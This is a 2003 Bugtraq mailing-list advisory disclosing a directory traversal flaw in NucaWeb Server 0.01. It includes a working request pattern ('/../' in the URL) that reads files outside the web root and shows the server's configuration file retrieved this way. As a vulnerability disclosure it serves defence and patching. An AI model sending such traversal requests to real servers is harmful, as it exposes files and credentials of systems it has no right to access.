[30412] in bugtraq
Directory traversal in NucaWeb Server
daemon@ATHENA.MIT.EDU (Over_G)
Tue Jun 10 11:52:51 2003
Date: Tue, 10 Jun 2003 13:28:02 +0400
From: Over_G <overg@mail.ru>
Reply-To: Over G <overg@mail.ru>
Message-ID: <1067213235.20030610132802@mail.ru>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Product: Nuca WebServer
Version: 0.01
OffSite: http://www.geocities.com/nucainterface
Problem: Directory traversal
------------------------------------------------
NucaWebServer - server, written in Delphi.
This server have a large problem - Atacker may view all files on hard disk.
The server does not process the entering data.
http://[victim]/../existing_file
Example:
http://[victim]/../webserver.ini
and you may be view webserver configuration.
[Configuration] SSL=0 Port=80 Root=D:\webservers\Nms\web Authentic=0 Username= Password=
www.overg.com www.dwcgr0up.com
regards, Over G[DWC Gr0up]
